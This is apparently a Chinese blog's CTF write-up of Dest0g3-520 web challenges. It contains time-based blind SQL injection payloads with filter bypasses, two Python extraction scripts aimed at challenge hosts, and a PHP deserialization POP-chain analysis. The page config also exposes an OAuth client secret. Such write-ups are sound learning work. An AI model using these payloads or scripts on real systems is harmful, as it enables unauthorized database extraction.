<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Latte">
    
    <title>
        
            2022Dest0g3-520迎新赛-web(部分) |
        
        Latte&#39;s
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/logo.png">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/font/css/brands.min.css">
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"ohvy.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"Latte's","author":"Latte","avatar":"/images/cat.svg","logo":"/images/logo.png","favicon":"/images/logo.png"},"menu":{"home":"/","archives":"/archives","tags":"/tags","categories":"/categories","tools":"/tools","about":"/about"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Latte and Americano.","hitokoto":false},"social_contact":{"enable":true,"links":{"github":"https://github.com/ohvy","weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":"shiwwang@163.com"}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":false,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":true,"reward":{"enable":false,"img_link":null,"text":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":true,"preload":false},"comment":{"enable":true,"use":"gitalk","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":"ohvy","github_admins":null,"repository":"gitalk-comments","client_id":"Ov23liQm7PTQpK5JLa0h","client_secret":"ba0525d7d59a301a09ac76ed9299df6ceb9a42a5","proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2022,"word_count":false,"icp":{"enable":false,"record_code":null,"url":"https://beian.miit.gov.cn"},"site_deploy":{"enable":false,"provider":"github","url":null},"shields_style":{"enable":false,"custom":[{"link_url":null,"img_url":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{"tools":[{"category":"聊天 AI"},{"name":"ChatGPT","link":"https://chat.openai.com/","description":"OpenAI 旗下 AI 聊天对话工具","image":"/images/tools/chatgpt.svg"},{"name":"Gemini","link":"https://gemini.google.com/app","description":"Google 旗下 AI 聊天对话工具","image":"/images/tools/gemini.svg"},{"category":"待开发"}]},"version":"4.1.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.png">
                </a>
            
            <a class="site-name border-box" href="/">
               Latte&#39;s
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                
                                标签
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                
                                分类
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/tools"
                            >
                                
                                工具
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags"
                    >标签</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories"
                    >分类</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tools"
                    >工具</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        2022Dest0g3-520迎新赛-web(部分)
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/cat.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Latte</span>
                                
                                    <span class="author-badge">Lv2</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2022-12-27 21:02:24</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Mon May 06 2024 20:45:49 GMT+0800">2024-05-06 20:45:49</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/Write-Up/">Write Up</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/CTF/">CTF</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/web/">web</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <p>最近身体抱恙，终于缓过劲来继续着手学习、做题。一方面对SQL注入基础和数据库基础做了一定的知识补充，另一方面接着投入到暑假时未竟的<strong>Dest0g3-520迎新赛</strong>上。感兴趣的朋友们可以到我的博客转转 <a href="https://ohvy.github.io/">Latte’s Blog</a> ，也欢迎大家为我提取一些宝贵的意见。</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/match/matches/109/challenges" >题目地址<i class="fas fa-external-link-alt"></i></a></p>
<h1 id="Really-Easy-SQL"><a href="#Really-Easy-SQL" class="headerlink" title="Really Easy SQL"></a>Really Easy SQL</h1><p>网站title告诉我们这是一个“精美的钓鱼站”，大抵是用来诱惑用户输入账号密码，然后将他们存储到数据库中去。输入一些账号密码进去尝试一下，发现不会回显有用信息，差不多可以判断是一道insert型的盲注题了。<br>题目给出了Hint：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Really Easy SQL insert型注入</span><br><span class="line">$black_list=array(&#x27;union&#x27;,&#x27;updatexml&#x27;,&#x27;order&#x27;,&#x27;by&#x27;,&#x27;substr&#x27;,&#x27;and&#x27;,&#x27;extractvalue&#x27;,&#x27;;&#x27;,&#x27;sleep&#x27;,&#x27;join&#x27;,&#x27;alter&#x27;,&#x27;handler&#x27;,&#x27;char&#x27;,&#x27;+&#x27;,&#x27;/&#x27;,&#x27;like&#x27;,&#x27;regexp&#x27;,&#x27;offset&#x27;,&#x27;sleep&#x27;,&#x27;case&#x27;,&#x27;&amp;&#x27;,&#x27;-&#x27;,&#x27;hex&#x27;,&#x27;%0&#x27;,&#x27;load&#x27;,&#x27; &#x27;);</span><br></pre></td></tr></table></figure>
<p>被ban掉了许多东西，包括时间盲注常用的函数<code>sleep</code>，没关系，我们还有<code>benchmark</code>可以用。</p>
<blockquote>
<p>这里给出一些<strong>时间盲注</strong>常用的函数：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">sleep()                      //延迟函数</span><br><span class="line">BENCHMARK(count,expr)函数    //将expr语句执行count次来达到延迟的目的，返回值为0</span><br><span class="line">if(condition,true,false)     //条件语句</span><br><span class="line">If表达式：IF(expr1,expr2,expr3)</span><br><span class="line">/* 如果 expr1 是TRUE (expr1 &lt;&gt; 0 and expr1 &lt;&gt; NULL)，则 IF()的返回值为expr2; 否则返回值则为 expr3 */</span><br><span class="line">ascii()                     //转换成ascii码</span><br><span class="line">substring(&quot;string&quot;,strart,length) //mid()也一样，取出字符串里的第几位开始，长度多少的字符</span><br><span class="line">Mid函数：MID(column_name,start[,length])</span><br></pre></td></tr></table></figure>

<p>用<code>benchmark</code>方法测试一下（空格被ban了，所以用<code>%a0</code>过滤。前后的<code>&#39;</code>是为了闭合，除此外，还可以采用<code>(</code>等方式）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a&#x27;or%a0benchmark(1000000,sha(1))or&#x27;</span><br></pre></td></tr></table></figure>
<img  
                       lazyload
                       alt="image"
                       data-src="/2022/12/27/2022Dest0g3-520%E8%BF%8E%E6%96%B0%E8%B5%9B-web-%E9%83%A8%E5%88%86/benchmark.png"
                        class="" title="benchmark测试"
                 >

<p>测试延时在4s左右。</p>
<blockquote>
<p>关于insert注入的原理，我这里留一个疑问。对于这道题目而言，username显然是一个字符串型，而benchmark函数返回值为0，如果insert语句如下</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">insert into ctf_test values(&#x27;a&#x27;or%a0benchmark(1000000,sha(1))or&#x27;&#x27;,&#x27;123456&#x27;);</span><br></pre></td></tr></table></figure>
<blockquote>
<p>那么SQL为什么不会因为错误<code>Truncated incorrect DOUBLE value: &#39;a&#39;</code>而无效？下图是我在本地MySQL进行测试的结果。可以看到，当没有<code>a</code>时会成功执行<code>benchmark</code>函数，并把返回的<code>0</code>作为字符型存入数据库表。而有<code>a</code>时，则会报错。（在后面的尝试中，发现把<code>a</code>改成其他数字也是可以成功执行的）</p>
</blockquote>
<img  
                       lazyload
                       alt="image"
                       data-src="/2022/12/27/2022Dest0g3-520%E8%BF%8E%E6%96%B0%E8%B5%9B-web-%E9%83%A8%E5%88%86/test.png"
                        class="" title="测试"
                 >

<p>接下来回顾一些常用的SQL SELECT操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 爆表名</span><br><span class="line">select(group_concat(table_name))from(information_schema.tables)where(table_schema=database());</span><br><span class="line">// 爆字段名（列名）</span><br><span class="line">select(group_concat(column_name))from(information_schema.columns)where(table_name=&#x27;test&#x27;);  // 这里的&#x27;test&#x27;即上一步爆出的表名</span><br></pre></td></tr></table></figure>

<p>前面我们测试的延时在4s左右，延迟过长，这里选择更用<code>md5(1)</code>，将延时控制在2s左右。<code>mid</code>函数能够获取爆出的数据的每一个字符，于是我们可以二分查找所有的字符进行遍历(这里用ASCII码为从32到127的字符集来实现)，与之ASCII码值进行比对——当<code>i &lt; mid</code>时，说明<code>mid</code>找大了，更新为最大值为<code>mid</code>；反之，则更新最小值为<code>mid</code>。<code>mid</code>更新的实现只需要每次进行<code>request</code>连接，并设置超时时间。当超时时，说明<code>i &lt; mid</code>，触发了<code>benchmark</code>.</p>
<p>根据上面的分析，我们就可以利用SQL语句能够在insert语句中被执行的特点，构造POC. </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = &quot;http://20351089-cacb-4fea-a68f-feb330422825.node4.buuoj.cn:81/&quot;</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line">for i in range(1, 50):</span><br><span class="line">    m = 32</span><br><span class="line">    n = 127</span><br><span class="line">    while 1:</span><br><span class="line">        mid = (m + n) // 2</span><br><span class="line"></span><br><span class="line">        # payload=&quot;0&#x27;or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),&#123;&#125;,1))&lt;&#123;&#125;),benchmark(2000000,md5(1)),0))or&#x27;&quot;.format(i,mid) #flaggg,user</span><br><span class="line">        # payload=&quot;0&#x27;or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name=&#x27;flaggg&#x27;)),&#123;&#125;,1))&lt;&#123;&#125;),benchmark(2000000,md5(1)),0))or&#x27;&quot;.format(i,mid) #cmd</span><br><span class="line">        payload = &quot;0&#x27;or(if((ascii(mid((select(cmd)from(flaggg)),&#123;&#125;,1))&lt;&#123;&#125;),benchmark(2000000,md5(1)),0))or&#x27;&quot;.format(i, mid)</span><br><span class="line">        data = &#123;</span><br><span class="line">            &#x27;username&#x27;: payload,</span><br><span class="line">            &#x27;password&#x27;: &#x27;123456&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">        # print(data)</span><br><span class="line">        try:</span><br><span class="line">            r = requests.post(url=url, data=data, timeout=1.5)</span><br><span class="line">            m = mid</span><br><span class="line">        except:</span><br><span class="line">            n = mid</span><br><span class="line">        if (m + 1 == n):</span><br><span class="line">            flag += chr(m)</span><br><span class="line">            print(flag)</span><br><span class="line">            break</span><br><span class="line">        time.sleep(0.2)</span><br><span class="line">    time.sleep(1)</span><br></pre></td></tr></table></figure>

<p>如上就是一道盲注题的完整思路，或可作为学习SQL注入的基础知识的一部分来看。关于最大超时时间的设置和<code>benchmark</code>的执行次数需要根据实际测试情况进行调整，与网速有着关系，这可能导致跑出来的结果有误差，有没有减小误差的办法呢？</p>
<h1 id="easysql"><a href="#easysql" class="headerlink" title="easysql"></a>easysql</h1><p>与上题几乎没有什么不同，区别在于多过滤了<code>&lt;</code>和<code>&gt;</code>（虽然我也不知道怎么看出来多过滤了这俩玩意儿，Hint貌似没给），因此无法再用二分法，改用<code>=</code>即可。<br>构造POC如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = &quot;http://983f9517-713d-4041-8c6d-d3dc94e57452.node4.buuoj.cn:81/&quot;</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line">for i in range(1, 50):</span><br><span class="line">    a = 0</span><br><span class="line">    for j in range(128, 32, -1):</span><br><span class="line">        # payload=&quot;0&#x27;or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),&#123;&#125;,1))=&#123;&#125;),benchmark(2000000,md5(1)),0))or&#x27;&quot;.format(i,j) #flaggg,user</span><br><span class="line">        # payload=&quot;0&#x27;or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name=&#x27;flaggg&#x27;)),&#123;&#125;,1))=&#123;&#125;),benchmark(2000000,md5(1)),0))or&#x27;&quot;.format(i,j) #cmd</span><br><span class="line">        payload = &quot;0&#x27;or(if((ascii(mid((select(cmd)from(flaggg)),&#123;&#125;,1))=&#123;&#125;),benchmark(2000000,md5(1)),0))or&#x27;&quot;.format(i, j)</span><br><span class="line">        data = &#123;</span><br><span class="line">            &#x27;username&#x27;: &#x27;a&#x27;,</span><br><span class="line">            &#x27;password&#x27;: payload</span><br><span class="line">        &#125;</span><br><span class="line">        # print(data)</span><br><span class="line">        try:</span><br><span class="line">            r = requests.post(url=url, data=data, timeout=1.5)</span><br><span class="line">        except:</span><br><span class="line">            flag += chr(j)</span><br><span class="line">            print(flag)</span><br><span class="line">            break</span><br><span class="line">        if (j == 33):</span><br><span class="line">            a = 1</span><br><span class="line">        time.sleep(0.5)</span><br><span class="line">    if (a == 1):</span><br><span class="line">        print(flag)</span><br><span class="line">        break</span><br><span class="line">    time.sleep(1)</span><br></pre></td></tr></table></figure>
<img  
                       lazyload
                       alt="image"
                       data-src="/2022/12/27/2022Dest0g3-520%E8%BF%8E%E6%96%B0%E8%B5%9B-web-%E9%83%A8%E5%88%86/flag.png"
                        class="" title="flag"
                 >


<h1 id="NodeSoEasy"><a href="#NodeSoEasy" class="headerlink" title="NodeSoEasy"></a>NodeSoEasy</h1><h1 id="PharPOP"><a href="#PharPOP" class="headerlink" title="PharPOP"></a>PharPOP</h1><p>考点在于phar反序列化，题目给出源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">function waf($data)&#123;</span><br><span class="line">    if (is_array($data))&#123;</span><br><span class="line">        die(&quot;Cannot transfer arrays&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if (preg_match(&#x27;/get|air|tree|apple|banana|php|filter|base64|rot13|read|data/i&#x27;, $data)) &#123;</span><br><span class="line">        die(&quot;You can&#x27;t do&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class air&#123;</span><br><span class="line">    public $p;</span><br><span class="line"></span><br><span class="line">    public function __set($p, $value) &#123;</span><br><span class="line">        $p = $this-&gt;p-&gt;act;</span><br><span class="line">        echo new $p($value);                    // 4.任意类，最终利用点</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class tree&#123;</span><br><span class="line">    public $name;</span><br><span class="line">    public $act;</span><br><span class="line"></span><br><span class="line">    public function __destruct() &#123;</span><br><span class="line">        return $this-&gt;name();                   // 1.触发 tree 的 _call 方法</span><br><span class="line">    &#125;</span><br><span class="line">    public function __call($name, $arg)&#123;</span><br><span class="line">        $arg[1] =$this-&gt;name-&gt;$name;            // 2.触发 apple 的 _get 方法</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class apple &#123;</span><br><span class="line">    public $xxx;</span><br><span class="line">    public $flag;</span><br><span class="line">    public function __get($flag)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;xxx-&gt;$flag = $this-&gt;flag;        // 3.触发 air 的 _set 方法</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class D &#123;</span><br><span class="line">    public $start;</span><br><span class="line"></span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        $data = $_POST[0];</span><br><span class="line">        if ($this-&gt;start == &#x27;w&#x27;) &#123;</span><br><span class="line">            waf($data);</span><br><span class="line">            $filename = &quot;/tmp/&quot;.md5(rand()).&quot;.jpg&quot;;</span><br><span class="line">            file_put_contents($filename, $data);</span><br><span class="line">            echo $filename;</span><br><span class="line">        &#125; else if ($this-&gt;start == &#x27;r&#x27;) &#123;</span><br><span class="line">            waf($data);</span><br><span class="line">            $f = file_get_contents($data);</span><br><span class="line">            if($f)&#123;</span><br><span class="line">                echo &quot;It is file&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">            else&#123;</span><br><span class="line">                echo &quot;You can look at the others&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class banana &#123;</span><br><span class="line">    public function __get($name)&#123;</span><br><span class="line">        return $this-&gt;$name;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">// flag in /</span><br><span class="line">if(strlen($_POST[1]) &lt; 55) &#123;</span><br><span class="line">    $a = unserialize($_POST[1]);</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    echo &quot;str too long&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">throw new Error(&quot;start&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h2><p>列出几个分析POP链常用的魔术方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">__construct()  //当对象创建时触发</span><br><span class="line">__destruct()   //当对象销毁时触发</span><br><span class="line">__wakeup()     //当使用unserialize时触发</span><br><span class="line">__sleep()     //当使用serialize时触发</span><br><span class="line">__call()      //当对象上下文中调用不可访问的方法时触发</span><br><span class="line">__get()       //当访问不可访问或不存在的属性时触发</span><br><span class="line">__set()       //当设置不可访问或不存在属性时触发</span><br><span class="line">__toString()  //当把类当作字符串使用时触发</span><br><span class="line">__invoke()    //当对象调用为函数时触发</span><br></pre></td></tr></table></figure>

<p>审计源码找出一条可利用的链子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tree::_destruct() =&gt; tree::_call() =&gt; apple::_get() =&gt; air::_set() =&gt;  原生类</span><br></pre></td></tr></table></figure>



                </div>
                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/CTF/">CTF</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/web/">web</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="分享到 QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="分享到微信"
            data-tooltip-img-tip="微信扫一扫"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="分享到微博"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2023/01/13/%E9%9B%86%E8%AE%ADWriteUp-1/"
                                   title="集训WriteUp-1"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">集训WriteUp-1</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2022/12/24/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/"
                                   title="XSS跨站脚本攻击"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">XSS跨站脚本攻击</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    


    <div class="comments-container border-box">
        <div id="comments-anchor" class="comment-area-title border-box">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        <div class="comment-plugin-fail border-box">
    <span class="fail-tip">评论插件加载失败</span>
    <button class="reload keep-button">点击重新加载</button>
</div>
<div class="comment-plugin-loading flex-center border-box">
    <i class="loading-icon fa-solid fa-spinner fa-spin"></i>
    <span class="load-tip">正在加载评论插件</span>
</div>
<script data-pjax>
  window.KeepCommentPlugin = {}
  window.KeepCommentPlugin.hideLoading = () => {
    const cplDom = document.querySelector('.comments-container .comment-plugin-loading')
    cplDom.style.display = 'none'
  }
  window.KeepCommentPlugin.loadFailHandle = () => {
    window.KeepCommentPlugin.hideLoading()
    const cpfDom = document.querySelector('.comments-container .comment-plugin-fail')
    cpfDom.style.display = 'flex'
    cpfDom.querySelector('.reload').addEventListener('click', () => {
      window.location.reload()
    })
  }
</script>

        
            

    <div class="gitalk-comment-container">
        <div id="gitalk-container"></div>
